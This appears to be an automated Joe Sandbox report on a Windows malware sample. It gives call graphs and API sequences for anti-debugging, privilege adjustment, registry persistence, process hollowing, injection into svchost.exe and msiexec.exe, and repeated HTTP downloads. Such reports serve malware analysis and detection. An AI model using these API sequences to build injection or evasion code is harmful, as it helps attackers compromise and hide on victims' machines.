7ff6dad714ec LoadLibraryA GetProcAddress 1119->1286 1121 7ff6dad7210e 1287 7ff6dad714ec LoadLibraryA GetProcAddress 1121->1287 1123 7ff6dad72128 1288 7ff6dad714ec LoadLibraryA GetProcAddress 1123->1288 1125 7ff6dad72142 1289 7ff6dad714ec LoadLibraryA GetProcAddress 1125->1289 1127 7ff6dad7215c 1128 7ff6dad731b8 IsDebuggerPresent 1127->1128 1129 7ff6dad731ca GetCurrentProcess CheckRemoteDebuggerPresent 1128->1129 1130 7ff6dad731c6 1128->1130 1129->1130 1130->841 1130->842 1132 7ff6dad740d6 GetTokenInformation 1131->1132 1133 7ff6dad7343d 1131->1133 1290 7ff6dad73b20 VirtualAlloc 1132->1290 1142 7ff6dad73cb0 GetModuleFileNameW 1133->1142 1135 7ff6dad74107 GetTokenInformation 1136 7ff6dad74134 CloseHandle 1135->1136 1138 7ff6dad7414e AdjustTokenPrivileges CloseHandle 1135->1138 1137 7ff6dad73af0 VirtualFree 1136->1137 1139 7ff6dad74149 1137->1139 1291 7ff6dad73af0 1138->1291 1139->1133 1143 7ff6dad73cdb PathFindFileNameW wcslen 1142->1143 1144 7ff6dad73d9e wcsncpy 1142->1144 1145 7ff6dad73d15 1143->1145 1144->1145 1145->846 1147 7ff6dad7421c GetLastError 1146->1147 1148 7ff6dad73529 1146->1148 1147->1148 1149 7ff6dad74229 CloseHandle 1147->1149 1148->872 1148->873 1149->1148 1294 7ff6dad73890 1150->1294 1152 7ff6dad73228 1297 7ff6dad74300 CreateFileW 1152->1297 1156 7ff6dad73710 3 API calls 1155->1156 1157 7ff6dad73a6b 1156->1157 1158 7ff6dad73890 11 API calls 1157->1158 1159 7ff6dad73a75 GetModuleFileNameW DeleteFileW CopyFileW 1158->1159 1160 7ff6dad73ab7 SetFileAttributesW 1159->1160 1161 7ff6dad73563 1159->1161 1314 7ff6dad73980 RegOpenKeyExW 1160->1314 1164 7ff6dad733a8 GetVersionExW 1161->1164 1165 7ff6dad733d9 1164->1165 1165->882 1165->883 1167 7ff6dad73890 11 API calls 1166->1167 1168 7ff6dad732b9 1167->1168 1317 7ff6dad74530 CreateFileW 1168->1317 1170 7ff6dad732d1 1171 7ff6dad73313 CreateThread 1170->1171 1329 7ff6dad74090 1170->1329 1171->870 1175->899 1176->901 1177->903 1178->905 1179->907 1180->909 1181->911 1182->913 1183->915 1184->917 1185->919 1186->921 1187->923 1188->925 1189->927 1190->929 1191->931 1192->933 1193->935 1194->937 1195->939 1196->941 1197->943 1198->945 1199->947 1200->949 1201->951 1202->953 1203->955 1204->957 1205->959 1206->961 1207->963 1208->965 1209->967 1210->969 1211->971 1212->973 1213->975 1214->977 1215->979 1216->981 1217->983 1218->985 1219->987 1220->989 1221->991 1222->993 1223->995 1224->997 1225->999 1226->1001 1227->1003 1228->1005 1229->1007 1230->1009 1231->1011 1232->1013 1233->1015 1234->1017 1235->1019 1236->1021 1237->1023 1238->1025 1239->1027 1240->1029 1241->1031 1242->1033 1243->1035 1244->1037 1245->1039 1246->1041 1247->1043 1248->1045 1249->1047 1250->1049 1251->1051 1252->1053 1253->1055 1254->1057 1255->1059 1256->1061 1257->1063 1258->1065 1259->1067 1260->1069 1261->1071 1262->1073 1263->1075 1264->1077 1265->1079 1266->1081 1267->1083 1268->1085 1269->1087 1270->1089 1271->1091 1272->1093 1273->1095 1274->1097 1275->1099 1276->1101 1277->1103 1278->1105 1279->1107 1280->1109 1281->1111 1282->1113 1283->1115 1284->1117 1285->1119 1286->1121 1287->1123 1288->1125 1289->1127 1290->1135 1292 7ff6dad73b14 1291->1292 1293 7ff6dad73b01 VirtualFree 1291->1293 1292->1133 1293->1292 1303 7ff6dad73710 GetWindowsDirectoryW 1294->1303 1296 7ff6dad738bf 8 API calls 1296->1152 1298 7ff6dad74356 1297->1298 1299 7ff6dad74377 GetLastError 1297->1299 1308 7ff6dad74250 GetFileSize 1298->1308 1301 7ff6dad7323b CreateThread Sleep CreateThread 1299->1301 1301->881 1304 7ff6dad7375a 1303->1304 1305 7ff6dad73764 GetVolumeInformationW 1303->1305 1304->1305 1307 7ff6dad737e0 1305->1307 1306 7ff6dad7384a wsprintfW 1306->1296 1307->1306 1313 7ff6dad73b20 VirtualAlloc 1308->1313 1310 7ff6dad7427c 1311 7ff6dad742c6 CloseHandle 1310->1311 1312 7ff6dad74290 SetFilePointer ReadFile 1310->1312 1311->1301 1312->1311 1313->1310 1315 7ff6dad739c5 RegSetValueExW RegCloseKey 1314->1315 1316 7ff6dad739c1 1314->1316 1315->1316 1316->1161 1318 7ff6dad7458a 1317->1318 1319 7ff6dad74591 GetFileSize GetProcessHeap RtlAllocateHeap 1317->1319 1318->1170 1320 7ff6dad745ec ReadFile 1319->1320 1321 7ff6dad745da CloseHandle 1319->1321 1322 7ff6dad7463b 1320->1322 1323 7ff6dad74613 GetProcessHeap HeapFree CloseHandle 1320->1323 1321->1318 1324 7ff6dad7467c 1322->1324 1325 7ff6dad74654 GetProcessHeap HeapFree CloseHandle 1322->1325 1323->1318 1326 7ff6dad747e7 GetProcessHeap HeapFree CloseHandle 1324->1326 1327 7ff6dad74737 GetProcessHeap RtlAllocateHeap 1324->1327 1325->1318 1326->1318 1328 7ff6dad74780 1327->1328 1328->1326 1348 7ff6dad73fd0 CreateToolhelp32Snapshot 1329->1348 1332 7ff6dad710d8 OpenProcess 1333 7ff6dad7111f 1332->1333 1345 7ff6dad71115 1332->1345 1355 7ff6dad713c4 GetModuleHandleA GetProcAddress 1333->1355 1335 7ff6dad7112c 1336 7ff6dad711fe VirtualAllocEx 1335->1336 1335->1345 1337 7ff6dad7124f WriteProcessMemory 1336->1337 1336->1345 1338 7ff6dad71286 WriteProcessMemory 1337->1338 1337->1345 1339 7ff6dad712d1 1338->1339 1338->1345 1357 7ff6dad71444 GetSystemInfo 1339->1357 1341 7ff6dad712fe GetModuleHandleA GetProcAddress 1344 7ff6dad71338 1341->1344 1341->1345 1343 7ff6dad71444 GetSystemInfo 1346 7ff6dad712f4 1343->1346 1344->1345 1347 7ff6dad71399 CloseHandle 1344->1347 1345->1171 1346->1341 1346->1347 1347->1345 1349 7ff6dad7400b Process32FirstW 1348->1349 1350 7ff6dad732fe 1348->1350 1351 7ff6dad7402a wcscmp 1349->1351 1352 7ff6dad74065 CloseHandle 1349->1352 1350->1332 1353 7ff6dad74041 1351->1353 1354 7ff6dad7404e Process32NextW 1351->1354 1352->1350 1353->1352 1354->1351 1354->1352 1356 7ff6dad713ff 1355->1356 1356->1335 1358 7ff6dad712ea 1357->1358 1358->1341 1358->1343 1420 7ff6dad73078 1425 7ff6dad73081 1420->1425 1421 7ff6dad7316d 1424 7ff6dad73bf0 RegDeleteKeyW 1424->1425 1425->1421 1425->1424 1426 7ff6dad73df0 9 API calls 1425->1426 1427 7ff6dad73980 3 API calls 1425->1427 1429 7ff6dad74410 CreateFileW 1425->1429 1434 7ff6dad73b50 RegOpenKeyExW 1425->1434 1426->1425 1428 7ff6dad7315d Sleep 1427->1428 1428->1425 1430 7ff6dad7446b 1429->1430 1431 7ff6dad744a6 1429->1431 1437 7ff6dad74390 SetFilePointer WriteFile SetEndOfFile 1430->1437 1431->1425 1433 7ff6dad74487 SetFileAttributesW CloseHandle 1433->1431 1435 7ff6dad73ba4 RegSetValueExW RegCloseKey 1434->1435 1436 7ff6dad73bde 1434->1436 1435->1436 1436->1425 1437->1433 1473 7ff6dad72f38 1474 7ff6dad73890 11 API calls 1473->1474 1475 7ff6dad72f77 1474->1475 1476 7ff6dad74530 17 API calls 1475->1476 1477 7ff6dad72f9b 1476->1477 1478 7ff6dad74090 5 API calls 1477->1478 1479 7ff6dad72fbe 1478->1479 1480 7ff6dad710d8 10 API calls 1479->1480 1481 7ff6dad72fd3 GetProcessHeap HeapFree 1480->1481 1456 7ff6dad7216c 1457 7ff6dad72196 InternetOpenW 1456->1457 1458 7ff6dad721c3 Sleep 1457->1458 1459 7ff6dad721d0 InternetOpenUrlW 1457->1459 1458->1457 1460 7ff6dad72259 HttpQueryInfoA 1459->1460 1461 7ff6dad72207 InternetOpenUrlW 1459->1461 1463 7ff6dad72288 InternetCloseHandle InternetCloseHandle Sleep 1460->1463 1464 7ff6dad722ae 1460->1464 1461->1460 1462 7ff6dad7223e InternetCloseHandle Sleep 1461->1462 1462->1457 1463->1457 1465 7ff6dad722b8 InternetCloseHandle InternetOpenUrlW 1464->1465 1466 7ff6dad72315 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1464->1466 1465->1466 1467 7ff6dad722fa InternetCloseHandle Sleep 1465->1467 1468 7ff6dad7237a InternetCloseHandle InternetCloseHandle 1466->1468 1469 7ff6dad72394 1466->1469 1467->1457 1470 7ff6dad72413 1468->1470 1471 7ff6dad7239c InternetReadFile 1469->1471 1472 7ff6dad723ea InternetCloseHandle InternetCloseHandle 1469->1472 1471->1469 1471->1472 1472->1470 1359 7ff6dad73388 1362 7ff6dad724d8 GetModuleFileNameW 1359->1362 1363 7ff6dad72559 1362->1363 1369 7ff6dad72554 1362->1369 1364 7ff6dad725ad 1363->1364 1365 7ff6dad72597 1363->1365 1405 7ff6dad72418 ExpandEnvironmentStringsW 1364->1405 1366 7ff6dad725cb 1365->1366 1367 7ff6dad725a1 1365->1367 1406 7ff6dad72458 ExpandEnvironmentStringsW 1366->1406 1367->1369 1407 7ff6dad72498 ExpandEnvironmentStringsW 1367->1407 1370 7ff6dad725c2 1370->1369 1373 7ff6dad7261d CreateProcessW 1370->1373 1373->1369 1374 7ff6dad72678 CreateFileW 1373->1374 1374->1369 1375 7ff6dad726bf GetFileSize 1374->1375 1376 7ff6dad726dd 1375->1376 1377 7ff6dad726e7 CloseHandle 1375->1377 1376->1377 1378 7ff6dad726f7 VirtualAlloc 1376->1378 1377->1369 1379 7ff6dad72731 ReadFile 1378->1379 1380 7ff6dad72721 CloseHandle 1378->1380 1381 7ff6dad72781 CloseHandle GetThreadContext 1379->1381 1382 7ff6dad7275e VirtualFree CloseHandle 1379->1382 1380->1369 1383 7ff6dad727e9 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 1381->1383 1384 7ff6dad727d1 VirtualFree 1381->1384 1382->1369 1385 7ff6dad72888 VirtualAllocEx 1383->1385 1386 7ff6dad72870 VirtualFree 1383->1386 1384->1369 1387 7ff6dad7290b WriteProcessMemory 1385->1387 1388 7ff6dad728f3 VirtualFree 1385->1388 1386->1369 1389 7ff6dad72941 VirtualFree 1387->1389 1392 7ff6dad72959 1387->1392 1388->1369 1389->1369 1390 7ff6dad7298f WriteProcessMemory 1391 7ff6dad72a1a VirtualFree 1390->1391 1390->1392 1391->1369 1392->1390 1397 7ff6dad72a37 1392->1397 1393 7ff6dad72d28 WriteProcessMemory SetThreadContext 1395 7ff6dad72dc3 ResumeThread 1393->1395 1396 7ff6dad72dae VirtualFree 1393->1396 1394 7ff6dad72aa9 RtlCompareMemory 1394->1397 1401 7ff6dad72afc 1394->1401 1398 7ff6dad72dea VirtualFree 1395->1398 1399 7ff6dad72dd5 VirtualFree 1395->1399 1396->1369 1397->1393 1397->1394 1398->1369 1399->1369 1400 7ff6dad72d23 1400->1393 1401->1400 1402 7ff6dad72c2c ReadProcessMemory WriteProcessMemory 1401->1402 1403 7ff6dad72d19 1402->1403 1404 7ff6dad72d01 VirtualFree 1402->1404 1403->1401 1404->1369 1405->1370 1406->1370 1407->1370 1411 7ff6dad73348 1412 7ff6dad724d8 37 API calls 1411->1412 1413 7ff6dad73358 1412->1413 1414 7ff6dad72ea8 CreateMutexA 1415 7ff6dad72ecd ReleaseMutex CloseHandle 1414->1415 1416 7ff6dad72eea GetLastError 1414->1416 1417 7ff6dad72f2c 1415->1417 1418 7ff6dad72ef7 ReleaseMutex CloseHandle 1416->1418 1419 7ff6dad72f14 ReleaseMutex CloseHandle 1416->1419 1418->1417 1419->1417 1438 7ff6dad71088 GetModuleHandleA GetProcAddress 1439 7ff6dad710bb 1438->1439 1440 7ff6dad73188 1441 7ff6dad73191 1440->1441 1442 7ff6dad731aa 1441->1442 1445 7ff6dad73008 1441->1445 1450 7ff6dad72e08 CreateMutexA 1445->1450 1448 7ff6dad73068 Sleep 1448->1441 1449 7ff6dad73023 Sleep CreateThread WaitForSingleObject 1449->1448 1451 7ff6dad72e34 ReleaseMutex CloseHandle 1450->1451 1452 7ff6dad72e51 GetLastError 1450->1452 1453 7ff6dad72e93 1451->1453 1454 7ff6dad72e7b ReleaseMutex CloseHandle 1452->1454 1455 7ff6dad72e5e ReleaseMutex CloseHandle 1452->1455 1453->1448 1453->1449 1454->1453 1455->1453

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                                        callgraph 0 Function_00007FF6DAD72418 1 Function_00007FF6DAD73218 14 Function_00007FF6DAD74300 1->14 80 Function_00007FF6DAD73890 1->80 2 Function_00007FF6DAD73418 2->1 31 Function_00007FF6DAD73EE0 2->31 37 Function_00007FF6DAD741F0 2->37 40 Function_00007FF6DAD731B8 2->40 60 Function_00007FF6DAD733A8 2->60 61 Function_00007FF6DAD732A8 2->61 65 Function_00007FF6DAD740B0 2->65 66 Function_00007FF6DAD73CB0 2->66 96 Function_00007FF6DAD7153C 2->96 100 Function_00007FF6DAD73A40 2->100 3 Function_00007FF6DAD73B20 4 Function_00007FF6DAD7EC20 5 Function_00007FF6DAD73C30 6 Function_00007FF6DAD74530 46 Function_00007FF6DAD744C0 6->46 7 Function_00007FF6DAD7BBFB 8 Function_00007FF6DAD7BBF9 9 Function_00007FF6DAD7C4F8 10 Function_00007FF6DAD7BBF7 11 Function_00007FF6DAD7E9F6 12 Function_00007FF6DAD7EA05 13 Function_00007FF6DAD7DE04 108 Function_00007FF6DAD74250 14->108 15 Function_00007FF6DAD71000 16 Function_00007FF6DAD7D70B 17 Function_00007FF6DAD7EC09 18 Function_00007FF6DAD73008 19 Function_00007FF6DAD72E08 18->19 20 Function_00007FF6DAD74410 82 Function_00007FF6DAD74390 20->82 21 Function_00007FF6DAD73710 30 Function_00007FF6DAD736E0 21->30 22 Function_00007FF6DAD801DA 23 Function_00007FF6DAD710D8 23->15 43 Function_00007FF6DAD713C4 23->43 99 Function_00007FF6DAD71444 23->99 24 Function_00007FF6DAD724D8 24->0 53 Function_00007FF6DAD72498 24->53 86 Function_00007FF6DAD72458 24->86 25 Function_00007FF6DAD7B0D8 26 Function_00007FF6DAD7D2E5 27 Function_00007FF6DAD7C2E4 28 Function_00007FF6DAD7D2E3 29 Function_00007FF6DAD7CCE1 32 Function_00007FF6DAD714EC 33 Function_00007FF6DAD7D2E7 34 Function_00007FF6DAD7F7E6 35 Function_00007FF6DAD7BBF2 36 Function_00007FF6DAD73AF0 38 Function_00007FF6DAD73BF0 39 Function_00007FF6DAD73DF0 41 Function_00007FF6DAD736B8 42 Function_00007FF6DAD7EDB8 44 Function_00007FF6DAD7E6C5 45 Function_00007FF6DAD735C5 47 Function_00007FF6DAD7B2C0 48 Function_00007FF6DAD7E6CD 49 Function_00007FF6DAD736C8 50 Function_00007FF6DAD73FD0 51 Function_00007FF6DAD7149C 52 Function_00007FF6DAD7CE9D 54 Function_00007FF6DAD7E0A5 55 Function_00007FF6DAD7F6A3 56 Function_00007FF6DAD801A2 57 Function_00007FF6DAD7E0A1 58 Function_00007FF6DAD736AA 59 Function_00007FF6DAD7E4AB 61->5 61->6 61->23 61->80 81 Function_00007FF6DAD74090 61->81 62 Function_00007FF6DAD72EA8 63 Function_00007FF6DAD7FEA9 64 Function_00007FF6DAD7E6B4 65->3 65->36 67 Function_00007FF6DAD800B0 68 Function_00007FF6DAD73078 68->20 68->38 68->39 72 Function_00007FF6DAD73980 68->72 109 Function_00007FF6DAD73B50 68->109 69 Function_00007FF6DAD7E079 70 Function_00007FF6DAD7B778 71 Function_00007FF6DAD7B776 73 Function_00007FF6DAD7E07F 74 Function_00007FF6DAD7147F 75 Function_00007FF6DAD73388 75->24 76 Function_00007FF6DAD71088 77 Function_00007FF6DAD73188 77->18 78 Function_00007FF6DAD7E289 79 Function_00007FF6DAD7DA94 80->21 81->50 83 Function_00007FF6DAD7B05A 84 Function_00007FF6DAD7D65A 85 Function_00007FF6DAD7FE5A 87 Function_00007FF6DAD73559 88 Function_00007FF6DAD7B061 89 Function_00007FF6DAD7216C 90 Function_00007FF6DAD73368 90->24 91 Function_00007FF6DAD7E668 92 Function_00007FF6DAD7B772 93 Function_00007FF6DAD7EA72 94 Function_00007FF6DAD7EC71 95 Function_00007FF6DAD7B26F 96->32 96->51 97 Function_00007FF6DAD72F38 97->5 97->6 97->23 97->80 97->81 98 Function_00007FF6DAD7DC37 100->21 100->72 100->80 101 Function_00007FF6DAD7F74B 102 Function_00007FF6DAD73348 102->24 103 Function_00007FF6DAD7F749 104 Function_00007FF6DAD7B248 105 Function_00007FF6DAD7F747 106 Function_00007FF6DAD7B052 107 Function_00007FF6DAD7B152 108->3 110 Function_00007FF6DAD7C14F 111 Function_00007FF6DAD7B04E

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF6DAD724D8 Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 231 7ff6dad724d8-7ff6dad72552 GetModuleFileNameW 232 7ff6dad72559-7ff6dad72595 231->232 233 7ff6dad72554 231->233 235 7ff6dad725ad-7ff6dad725c9 call 7ff6dad72418 232->235 236 7ff6dad72597-7ff6dad7259f 232->236 234 7ff6dad72dfd-7ff6dad72e05 233->234 245 7ff6dad7260c-7ff6dad72616 235->245 237 7ff6dad725cb-7ff6dad725e7 call 7ff6dad72458 236->237 238 7ff6dad725a1-7ff6dad725a9 236->238 237->245 240 7ff6dad725ab-7ff6dad72607 238->240 241 7ff6dad725e9-7ff6dad72605 call 7ff6dad72498 238->241 240->234 241->245 249 7ff6dad7261d-7ff6dad72671 CreateProcessW 245->249 250 7ff6dad72618 245->250 251 7ff6dad72678-7ff6dad726b8 CreateFileW 249->251 252 7ff6dad72673 249->252 250->234 253 7ff6dad726ba 251->253 254 7ff6dad726bf-7ff6dad726db GetFileSize 251->254 252->234 253->234 255 7ff6dad726dd-7ff6dad726e5 254->255 256 7ff6dad726e7-7ff6dad726f2 CloseHandle 254->256 255->256 257 7ff6dad726f7-7ff6dad7271f VirtualAlloc 255->257 256->234 258 7ff6dad72731-7ff6dad7275c ReadFile 257->258 259 7ff6dad72721-7ff6dad7272c CloseHandle 257->259 260 7ff6dad72781-7ff6dad727cf CloseHandle GetThreadContext 258->260 261 7ff6dad7275e-7ff6dad7277c VirtualFree CloseHandle 258->261 259->234 262 7ff6dad727e9-7ff6dad7286e ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 260->262 263 7ff6dad727d1-7ff6dad727e4 VirtualFree 260->263 261->234 264 7ff6dad72888-7ff6dad728f1 VirtualAllocEx 262->264 265 7ff6dad72870-7ff6dad72883 VirtualFree 262->265 263->234 266 7ff6dad7290b-7ff6dad7293f WriteProcessMemory 264->266 267 7ff6dad728f3-7ff6dad72906 VirtualFree 264->267 265->234 268 7ff6dad72959-7ff6dad72964 266->268 269 7ff6dad72941-7ff6dad72954 VirtualFree 266->269 267->234 270 7ff6dad72976-7ff6dad72989 268->270 269->234 271 7ff6dad72a37-7ff6dad72a7e 270->271 272 7ff6dad7298f-7ff6dad72a18 WriteProcessMemory 270->272 275 7ff6dad72a90-7ff6dad72aa3 271->275 273 7ff6dad72a1a-7ff6dad72a2d VirtualFree 272->273 274 7ff6dad72a32 272->274 273->234 274->270 277 7ff6dad72d28-7ff6dad72dac WriteProcessMemory SetThreadContext 275->277 278 7ff6dad72aa9-7ff6dad72af8 RtlCompareMemory 275->278 279 7ff6dad72dc3-7ff6dad72dd3 ResumeThread 277->279 280 7ff6dad72dae-7ff6dad72dc1 VirtualFree 277->280 281 7ff6dad72afc-7ff6dad72b25 278->281 282 7ff6dad72afa 278->282 284 7ff6dad72dea-7ff6dad72df7 VirtualFree 279->284 285 7ff6dad72dd5-7ff6dad72de8 VirtualFree 279->285 280->234 286 7ff6dad72b30-7ff6dad72b3e 281->286 282->275 284->234 285->234 287 7ff6dad72b44-7ff6dad72bcf 286->287 288 7ff6dad72d23 286->288 289 7ff6dad72be1-7ff6dad72bef 287->289 288->277 290 7ff6dad72bf5-7ff6dad72c28 289->290 291 7ff6dad72d1e 289->291 292 7ff6dad72c2c-7ff6dad72cff ReadProcessMemory WriteProcessMemory 290->292 293 7ff6dad72c2a 290->293 291->286 295 7ff6dad72d19 292->295 296 7ff6dad72d01-7ff6dad72d14 VirtualFree 292->296 293->289 295->291 296->234
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: a84cd30e02b54a1d7e6c2a6b1c87ff30d9e49ed3be8c7b01658cf5b106b86537
                                                                                                                                                                                                                        • Instruction ID: 7edf9f947f714ed70ff651d996997198772dfbc09bb8bd7771fe1dc1a1ca03ab
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a84cd30e02b54a1d7e6c2a6b1c87ff30d9e49ed3be8c7b01658cf5b106b86537
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7232E732A0CBC186E774CB16E8547AEB3A1FB88B45F504236DA8E83B59DF3CD5548B41
                                                                                                                                                                                                                        Function 00007FF6DAD73418 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 297 7ff6dad73418-7ff6dad7342e call 7ff6dad7153c call 7ff6dad731b8 302 7ff6dad73438-7ff6dad73466 call 7ff6dad740b0 call 7ff6dad73cb0 call 7ff6dad73ee0 297->302 303 7ff6dad73430-7ff6dad73432 ExitProcess 297->303 310 7ff6dad73468-7ff6dad73479 call 7ff6dad741f0 302->310 311 7ff6dad734b7-7ff6dad734ca call 7ff6dad73ee0 302->311 318 7ff6dad7347b-7ff6dad7348c call 7ff6dad741f0 310->318 319 7ff6dad7348e-7ff6dad73490 ExitProcess 310->319 316 7ff6dad734cc-7ff6dad734dd call 7ff6dad741f0 311->316 317 7ff6dad73508-7ff6dad7351b call 7ff6dad73ee0 311->317 326 7ff6dad734e7 call 7ff6dad73218 316->326 327 7ff6dad734df-7ff6dad734e1 ExitProcess 316->327 329 7ff6dad7351d-7ff6dad7352e call 7ff6dad741f0 317->329 330 7ff6dad7355e-7ff6dad73574 call 7ff6dad73a40 call 7ff6dad733a8 317->330 318->319 328 7ff6dad73496 call 7ff6dad732a8 318->328 335 7ff6dad734ec-7ff6dad734f1 326->335 337 7ff6dad7349b-7ff6dad734a0 328->337 339 7ff6dad73538 call 7ff6dad73218 329->339 340 7ff6dad73530-7ff6dad73532 ExitProcess 329->340 349 7ff6dad735ca-7ff6dad736a2 CreateThread * 3 WaitForMultipleObjects ExitProcess 330->349 350 7ff6dad73576-7ff6dad73587 call 7ff6dad741f0 330->350 341 7ff6dad734f3-7ff6dad734fe Sleep 335->341 342 7ff6dad73500-7ff6dad73502 ExitProcess 335->342 344 7ff6dad734a2-7ff6dad734ad Sleep 337->344 345 7ff6dad734af-7ff6dad734b1 ExitProcess 337->345 348 7ff6dad7353d-7ff6dad73542 339->348 341->335 344->337 351 7ff6dad73544-7ff6dad7354f Sleep 348->351 352 7ff6dad73551-7ff6dad73553 ExitProcess 348->352 355 7ff6dad7359c-7ff6dad7359e ExitProcess 350->355 356 7ff6dad73589-7ff6dad7359a call 7ff6dad741f0 350->356 351->348 356->355 359 7ff6dad735a4 call 7ff6dad732a8 356->359 361 7ff6dad735a9-7ff6dad735ae 359->361 362 7ff6dad735bd-7ff6dad735bf ExitProcess 361->362 363 7ff6dad735b0-7ff6dad735bb Sleep 361->363 363->361
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: 0adf9e880a9d06d74ad0b688ea6cf154d33ace48af0fb221e22e7458701538ae
                                                                                                                                                                                                                        • Instruction ID: 1b763f8f3d1a57c3fa62afee20d8ff04517d802f754643c0d9f268e674024e6e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0adf9e880a9d06d74ad0b688ea6cf154d33ace48af0fb221e22e7458701538ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B611B21E0C69391F76CAB25A85937E22A0FF44305F6007B7D94FC65E3DE2DE4698750
                                                                                                                                                                                                                        Function 00007FF6DAD740B0 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1649695518.00007FF6DAD71000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DAD70000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649666699.00007FF6DAD70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649730158.00007FF6DAD75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649760681.00007FF6DAD78000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649790097.00007FF6DAD79000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1649808584.00007FF6DAD7B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6dad70000_65D35BAB97073674480464.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 5883799f07d152a8d2a009714e5b601515180045f018943f2e62cfac24bd2fab
                                                                                                                                                                                                                        • Instruction ID: f5e7df57a9877a8936d93f3f74efbe6229f8a00bdc1038de65b5b3125287750b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5883799f07d152a8d2a009714e5b601515180045f018943f2e62cfac24bd2fab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1313772A1CA8186E754DB15E85072EB7A0FBD4B81F105276FA8F83B69DF7CD4608B00
